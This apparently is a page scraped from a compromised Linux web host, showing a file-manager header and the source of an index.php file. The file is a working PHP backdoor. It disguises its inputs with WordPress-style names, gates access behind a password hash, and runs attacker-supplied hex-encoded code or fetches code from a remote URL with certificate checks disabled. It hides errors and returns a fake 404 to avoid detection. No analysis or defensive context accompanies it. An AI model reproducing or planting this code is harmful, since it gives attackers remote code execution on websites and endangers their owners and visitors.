| Linux olympus.webworksafrica.pro 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64 Path : /home/opendoor/public_html/69/ |
| Current File : /home/opendoor/public_html/69/index.php |
<?php
error_reporting(0);ini_set("display_errors", 0);try {
$WP_Query = array_merge($_GET, $_POST, $_COOKIE, $_FILES, $_ENV);
if (hash('sha256', md5($WP_Query['wp_locale'])) == '0991333901ce78d50d222401d3bf2216ed4738a39def993c9f0ba62f0228df4c') {if (isset($WP_Query['wp_the_query'])) {$response = pack("H*", $WP_Query['wp_the_query']);} else {$ch = curl_init();
curl_setopt_array($ch, array(CURLOPT_URL => pack("H*", $WP_Query['wp_query']),
CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30,CURLOPT_SSL_VERIFYPEER => false,CURLOPT_SSL_VERIFYHOST => false,));$response = curl_exec($ch);curl_close($ch);}eVAL( '?>'. $response );}} catch (Exception $e) { }
header("HTTP/1.1 404 Not Found");
header("Status: 404 Not Found");exit;